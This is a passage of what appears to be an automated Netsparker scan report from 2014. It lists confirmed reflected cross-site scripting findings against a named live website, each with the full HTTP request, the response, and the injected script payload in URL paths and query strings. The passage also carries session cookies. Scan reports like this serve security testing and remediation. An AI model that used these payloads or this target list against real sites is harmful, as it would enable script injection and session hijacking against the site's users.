Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Encoding:
Vary: Accept-Encoding
Transfer-Encoding: chunked
404;http://www.shalomlaam.co.il:80/site/l/'"--></style></script><script>netsparker(0x0002A2)</script><BR>script><BR>style><<script>netsparker(0x0002A2)<.asp?id=script>
3.43. /site/Presentation/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002DC)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/site/Presentation/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x0002DC)</script>
41 / 146
Request
GET /site/Presentation/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002DC)%3C/script%3E HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:56:55 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 178
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/site/Presentation/'"--></style></script><script>netsparker(0x0002DC)</script><BR>script><BR>style><<script>netsparker(0x0002DC)<.asp?id=script>
3.44. /js/images/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00040C)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/js/images/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00040C)%..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x00040C)</script>
Request
GET /js/images/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00040C)%3C/script%3E HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 14:00:54 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 170
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/js/images/'"--></style></script><script>netsparker(0x00040C)</script><BR>script><BR>style><<script>netsparker(0x00040C)<.asp?id=script>
3.45. /site/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000106)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/site/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000106)%3C/sc..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x000106)</script>
Request
GET /site/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000106)%3C/script%3E HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
42 / 146
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:44:09 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 165
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/site/'"--></style></script><script>netsparker(0x000106)</script><BR>script><BR>style><<script>netsparker(0x000106)<.asp?id=script>
3.46. /js/getbanner.asp CONFIRMED
http://www.shalomlaam.co.il/js/getbanner.asp?'"--></style></script><script>alert(0x0003EB)</script>
Parameters
Parameter Type Value
odiv GET 3
Query Based Query String '"--></style></script>
<script>alert(0x0003EB)</script>
Request
GET /js/getbanner.asp?'"--></style></script><script>netsparker(0x0003EB)</script> HTTP/1.1
Referer: http://www.shalomlaam.co.il/js/func_site.js
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 14:00:35 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 177
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/js/getbanner.asp?'"--></style></script><script>netsparker(0x0003EB)</script><BR>script><BR>style><<script>netsparker(0x0003EB)<.asp?id=script>
3.47. /vod/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00016B)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/vod/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00016B)%3C/scr..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x00016B)</script>
Request
GET /vod/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00016B)%3C/script%3E HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:45:55 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 164
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/vod/'"--></style></script><script>netsparker(0x00016B)</script><BR>script><BR>style><<script>netsparker(0x00016B)<.asp?id=script>
43 / 146
3.48. /gvideo/index.html'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000134)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/gvideo/index.html'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x000134)</script>
Request
GET /gvideo/index.html'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000134)%3C/script%3E HTTP/1.1
Referer: http://www.shalomlaam.co.il/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:44:28 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 177
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/gvideo/index.html'"--></style></script><script>netsparker(0x000134)</script><BR>script><BR>style><<script>netsparker(0x000134)<.asp?id=script>
3.49. /site/Branches/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002A1)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/site/Branches/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x0002A1)</script>
Request
GET /site/Branches/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002A1)%3C/script%3E HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:56:22 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 174
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/site/Branches/'"--></style></script><script>netsparker(0x0002A1)</script><BR>script><BR>style><<script>netsparker(0x0002A1)<.asp?id=script>
44 / 146
3.50. /ask/answer.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000195)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/ask/answer.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001..
Parameters
Parameter Type Value
id GET 805
URI-BASED Full URL '"--></style></script>
<script>alert(0x000195)</script>
Request
GET /ask/answer.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000195)%3C/script%3E HTTP/1.1
Referer: http://www.shalomlaam.co.il/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:46:57 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 174
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/ask/answer.asp'"--></style></script><script>netsparker(0x000195)</script><BR>script><BR>style><<script>netsparker(0x000195)<.asp?id=script>
3.51. /about'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0004F1)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/about'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0004F1)%3C/sc..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x0004F1)</script>
Request
GET /about'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0004F1)%3C/script%3E HTTP/1.1
Referer: http://www.shalomlaam.co.il/about/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 14:03:49 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 165
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/about'"--></style></script><script>netsparker(0x0004F1)</script><BR>script><BR>style><<script>netsparker(0x0004F1)<.asp?id=script>
45 / 146
3.52. /images/pagetop.asp CONFIRMED
http://www.shalomlaam.co.il/images/pagetop.asp?'"--></style></script><script>alert(0x0003EA)</script>
Parameters
Parameter Type Value
Query Based Query String '"--></style></script>
<script>alert(0x0003EA)</script>
Request
GET /images/pagetop.asp?'"--></style></script><script>netsparker(0x0003EA)</script> HTTP/1.1
Referer: http://www.shalomlaam.co.il/images/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 14:00:34 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 179
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/images/pagetop.asp?'"--></style></script><script>netsparker(0x0003EA)</script><BR>script><BR>style><<script>netsparker(0x0003EA)<.asp?id=script>
3.53. /pic/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00011F)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/pic/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00011F)%3C/scr..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x00011F)</script>
Request
GET /pic/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00011F)%3C/script%3E HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:44:19 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 164
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/pic/'"--></style></script><script>netsparker(0x00011F)</script><BR>script><BR>style><<script>netsparker(0x00011F)<.asp?id=script>
3.54. /about/search/default.asp CONFIRMED
http://www.shalomlaam.co.il/about/search/default.asp?'"--></style></script><script>alert(0x000560)</..
Parameters
Parameter Type Value
q GET 3
Query Based Query String '"--></style></script>
<script>alert(0x000560)</script>
46 / 146
Request
GET /about/search/default.asp?'"--></style></script><script>netsparker(0x000560)</script> HTTP/1.1
Referer: http://www.shalomlaam.co.il/about/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 14:04:25 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 185
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/about/search/default.asp?'"--></style></script><script>netsparker(0x000560)</script><BR>script><BR>style><<script>netsparker(0x000560)<.asp?id=script>
3.55. /images/Default.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003E9)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/images/Default.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x0003E9)</script>
Request
GET /images/Default.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0003E9)%3C/script%3E HTTP/1.1
Referer: http://www.shalomlaam.co.il/images/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 14:00:34 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 178
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/images/Default.asp'"--></style></script><script>netsparker(0x0003E9)</script><BR>script><BR>style><<script>netsparker(0x0003E9)<.asp?id=script>
3.56. /news/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000400)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/news/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000400)%3C/sc..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x000400)</script>
Request
GET /news/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000400)%3C/script%3E HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
47 / 146
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 14:00:49 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 165
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/news/'"--></style></script><script>netsparker(0x000400)</script><BR>script><BR>style><<script>netsparker(0x000400)<.asp?id=script>
3.57. /pages/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001F1)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/pages/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001F1)%3C/s..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x0001F1)</script>
Request
GET /pages/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001F1)%3C/script%3E HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:48:17 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 166
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/pages/'"--></style></script><script>netsparker(0x0001F1)</script><BR>script><BR>style><<script>netsparker(0x0001F1)<.asp?id=script>
3.58. /vod/vod.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000160)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/vod/vod.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000160)..
Parameters
Parameter Type Value
id GET 1763
URI-BASED Full URL '"--></style></script>
<script>alert(0x000160)</script>
Request
GET /vod/vod.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000160)%3C/script%3E HTTP/1.1
Referer: http://www.shalomlaam.co.il/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:45:17 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 171
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/vod/vod.asp'"--></style></script><script>netsparker(0x000160)</script><BR>script><BR>style><<script>netsparker(0x000160)<.asp?id=script>
48 / 146
3.59. /site/gallery/highslide/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000E8)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/site/gallery/highslide/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eale..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x0000E8)</script>
Request
GET /site/gallery/highslide/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000E8)%3C/script%3E HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:43:56 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 183
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/site/gallery/highslide/'"--></style></script><script>netsparker(0x0000E8)</script><BR>script><BR>style><<script>netsparker(0x0000E8)<.asp?id=script>
3.60. /search/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001D7)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/search/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001D7)%3C/..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x0001D7)</script>
Request
GET /search/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001D7)%3C/script%3E HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:48:04 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 167
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/search/'"--></style></script><script>netsparker(0x0001D7)</script><BR>script><BR>style><<script>netsparker(0x0001D7)<.asp?id=script>
49 / 146
3.61. /home/home_page.css'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00011E)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/home/home_page.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x00011E)</script>
Request
GET /home/home_page.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00011E)%3C/script%3E HTTP/1.1
Referer: http://www.shalomlaam.co.il/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:44:18 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 178
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/home/home_page.css'"--></style></script><script>netsparker(0x00011E)</script><BR>script><BR>style><<script>netsparker(0x00011E)<.asp?id=script>
3.62. /js/upload_image.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003AF)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/js/upload_image.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0..
Parameters
Parameter Type Value
field GET picture_
URI-BASED Full URL '"--></style></script>
<script>alert(0x0003AF)</script>
Request
GET /js/upload_image.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0003AF)%3C/script%3E HTTP/1.1
Referer: http://www.shalomlaam.co.il/js/func_site.js
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
